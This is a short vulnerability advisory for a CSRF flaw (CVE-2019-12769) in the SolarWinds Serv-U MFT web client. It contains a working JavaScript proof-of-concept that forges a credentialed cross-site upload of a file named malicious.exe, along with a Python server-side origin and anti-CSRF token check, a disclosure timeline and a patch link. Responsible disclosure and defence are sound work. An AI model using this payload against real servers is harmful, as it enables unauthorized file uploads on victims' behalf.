CVE-2019-12769 — SolarWinds Serv-U Managed File Transfer (MFT) Web client < 15.1.6 Vulnerable to CSRF

CLod
1 min read · Jul 11, 2019


SolarWinds Serv-U Managed File Transfer (MFT) Web client before 15.1.6 Hotfix 2 is vulnerable to Cross-Site Request Forgery in the file upload functionality via ?Command=Upload with the Dir and File parameters.
Note: earlier versions and Linux builds were not tested.

An attacker would be able to upload files on behalf of a logged-in user if the attacker can coerce that user into visiting a website they control. Below is an example of a malicious payload:

<script>
// Proof of concept from the advisory: a page on another origin issues a
// cross-site POST to the Serv-U upload endpoint. The victim's browser
// attaches the Serv-U session cookie because withCredentials is set,
// which is what lets the forged request succeed.
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/serv-u.endpoint\/?Command=Upload&Dir=%2F%20&TransferID=1&File=C%3A%5Cfakepath%5Cmalicious.exe", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------582127133260883362630819524");
xhr.withCredentials = true;
// multipart/form-data body; each boundary line in the body carries two extra leading dashes
var body = "-----------------------------582127133260883362630819524\r\n" +
"Content-Disposition: form-data; name=\"File\"; filename=\"malicious.exe\"\r\n" +
"Content-Type: application/x-ms-dos-executable\r\n" +
"\r\n" +
"MALICIOUS_CONTENT\x00\x00\x00\x00\x00\r\n" +
"-----------------------------582127133260883362630819524--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
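From the defender's side, this is the kind of server-side check that stops the cross-site upload shown above: an added example, not Serv-U's code or the advisory's. It assumes the site origin from the PoC, a per-session anti-CSRF token echoed in a hypothetical X-CSRF-Token header, and requests modelled as plain dicts.

```python
# Added example (not part of the advisory): checks that reject the forged
# ?Command=Upload request. Origin, token header name and sample requests
# are assumptions constructed for illustration.
from urllib.parse import urlparse, parse_qs

ALLOWED_ORIGIN = "https://serv-u.endpoint"  # hostname used in the advisory PoC

def is_upload_request(method, url):
    """True for the state-changing endpoint the PoC abuses (POST ?Command=Upload)."""
    qs = parse_qs(urlparse(url).query)
    return method.upper() == "POST" and qs.get("Command", [""])[0].lower() == "upload"

def csrf_verdict(method, url, headers, session_token):
    """Return 'allow', or a 'reject: ...' reason for the request.

    1. Only the state-changing upload request is subject to CSRF rules.
    2. Origin (Referer as fallback) must match the site itself; browsers
       always send Origin on a cross-site POST, so a missing header is rejected.
    3. The session's anti-CSRF token must be echoed in a custom header, which
       a cross-site XMLHttpRequest cannot add without a CORS preflight.
    """
    if not is_upload_request(method, url):
        return "allow"
    h = {k.lower(): v for k, v in headers.items()}
    source = h.get("origin") or h.get("referer")
    if not source:
        return "reject: missing Origin/Referer"
    got, want = urlparse(source), urlparse(ALLOWED_ORIGIN)
    if (got.scheme, got.netloc) != (want.scheme, want.netloc):
        return f"reject: cross-site source {got.scheme}://{got.netloc}"
    if h.get("x-csrf-token") != session_token:
        return "reject: missing or wrong anti-CSRF token"
    return "allow"

# Constructed sample requests: the PoC shape, a legitimate upload, and two controls
UPLOAD_URL = "https://serv-u.endpoint/?Command=Upload&Dir=%2F%20&TransferID=1&File=malicious.exe"
SESSION_TOKEN = "constructed-token-123"
SAMPLES = {
    "poc_cross_site": ("POST", UPLOAD_URL,
        {"Origin": "https://third-party.example", "Content-Type": "multipart/form-data; boundary=x"}),
    "legit_with_token": ("POST", UPLOAD_URL,
        {"Origin": "https://serv-u.endpoint", "X-CSRF-Token": SESSION_TOKEN}),
    "same_site_no_token": ("POST", UPLOAD_URL, {"Referer": "https://serv-u.endpoint/"}),
    "get_listing": ("GET", "https://serv-u.endpoint/?Command=List", {}),
}

def run_samples():
    """Evaluate every sample; only 'legit_with_token' and the GET are allowed."""
    return {name: csrf_verdict(m, u, hd, SESSION_TOKEN) for name, (m, u, hd) in SAMPLES.items()}
```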

Timeline:
* Vendor notified on 05/09/2018
* Vendor confirmed the issue on 31/10/2018
* Vendor released Serv-U v15.1.6 Hotfix 2 on 17/12/2018

Patch reference: https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-1-6-HotFix-2
